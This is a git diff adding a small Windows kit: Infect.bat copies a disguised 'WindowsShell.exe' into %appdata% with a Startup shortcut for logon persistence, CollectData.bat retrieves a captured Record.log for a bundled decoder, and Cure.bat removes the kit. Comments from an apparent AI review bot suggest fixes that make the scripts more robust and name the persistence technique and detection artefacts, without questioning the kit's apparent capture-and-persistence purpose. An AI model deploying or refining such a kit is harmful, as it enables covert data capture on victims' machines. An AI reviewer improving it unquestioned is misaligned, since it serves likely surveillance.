diff --git a/CollectData.bat b/CollectData.bat
new file mode 100644
index 0000000..35f4869
--- /dev/null
+++ b/CollectData.bat
@@ -0,0 +1 @@
+copy %appdata%\Record.log
\ No newline at end of file
diff --git a/Cure.bat b/Cure.bat
new file mode 100644
index 0000000..78dc19c
--- /dev/null
+++ b/Cure.bat
@@ -0,0 +1,4 @@
+del "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\WindowsShell.lnk"
+del %appdata%\Record.log
+TASKKILL /F /IM WindowsShell.exe /T
+del %appdata%\WindowsShell.exe
\ No newline at end of file
diff --git a/Infect.bat b/Infect.bat
new file mode 100644
index 0000000..6a258a0
--- /dev/null
+++ b/Infect.bat
@@ -0,0 +1,2 @@
+copy WindowsShell.exe %appdata%
+copy WindowsShell.lnk "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup"
\ No newline at end of file
diff --git a/RecordDecoder.exe b/RecordDecoder.exe
new file mode 100644
index 0000000..2027445
Binary files /dev/null and b/RecordDecoder.exe differ
diff --git a/WindowsShell.exe b/WindowsShell.exe
new file mode 100644
index 0000000..ffea3c2
Binary files /dev/null and b/WindowsShell.exe differ
diff --git a/WindowsShell.lnk b/WindowsShell.lnk
new file mode 100644
index 0000000..b49b039
Binary files /dev/null and b/WindowsShell.lnk differ
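Review bot: The single added line `copy %appdata%\Record.log` in CollectData.bat names no destination and quotes nothing, so the copy lands in whatever directory the script is started from and the command breaks when the profile path contains a space. The commit never says what Record.log holds; given the RecordDecoder.exe added alongside it, it presumably contains encoded captured data, so any copy should be handled as sensitive evidence. I would make the paths explicit, `copy "%appdata%\Record.log" "%~dp0Record.log"`, and add a `REM` line stating what the file contains and who may read it.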
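Review bot: Cure.bat deletes Record.log and only then stops WindowsShell.exe, so the still-running process can hold the file open or recreate it, and the final `del %appdata%\WindowsShell.exe` can fail if the image has not been released yet; the kill belongs first. The two `%appdata%` deletes are also unquoted, unlike the Startup shortcut line, and fail on profile paths with spaces. I would reorder to `TASKKILL /F /IM WindowsShell.exe /T`, then `del "%appdata%\Record.log"` and `del "%appdata%\WindowsShell.exe"`. Deleting Record.log also destroys the only record of what was captured on that host, so for incident response it should be preserved before cleanup.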
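Review bot: Infect.bat has no comment or description, and both files it installs, WindowsShell.exe and WindowsShell.lnk, are committed as opaque binaries, so nothing in this change lets a reviewer verify what will run at logon. The two `copy` lines place an executable in the root of `%appdata%` and a shortcut in the per-user Startup folder, which is the Startup-folder persistence pattern (ATT&CK T1547.001) under a name that imitates a Windows component. At minimum I would add a header such as `REM Installs WindowsShell.exe into %appdata% and a Startup shortcut so it runs at every logon; undo with Cure.bat`, and commit the source for the binaries. Defenders can key detection on exactly these artefacts: a new .lnk in the Startup folder and an unsigned executable directly under `%appdata%`.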